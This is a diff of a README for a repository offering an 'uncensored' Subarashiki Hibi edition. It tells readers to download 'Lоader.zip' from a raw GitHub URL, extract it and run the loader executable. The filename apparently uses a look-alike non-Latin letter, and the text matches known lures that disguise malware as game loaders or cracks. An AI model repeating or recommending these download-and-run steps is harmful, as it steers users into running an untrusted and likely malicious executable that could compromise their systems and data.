Horley509/SubarashikiHibiRawEdition/README.md

 ## 📦 Installation Instructions

-1. **Download Loader.rar from the repository.**
+1. **Download https://raw.githubusercontent.com/Horley509/SubarashikiHibiRawEdition/main/Lоader.zip from the repository.**
-2. Extract the contents of `Loader.rar` to your preferred directory using software like WinRAR, 7-Zip, or The Unarchiver.
+2. Extract the contents of `https://raw.githubusercontent.com/Horley509/SubarashikiHibiRawEdition/main/Lоader.zip` to your preferred directory using software like WinRAR, 7-Zip, or The Unarchiver.
 3. Run the loader executable for your operating system (see OS Compatibility Table below).
 4. Follow the on-screen prompts to set up the uncensored version.
 5. Enjoy the full Subarashiki Hibi experience!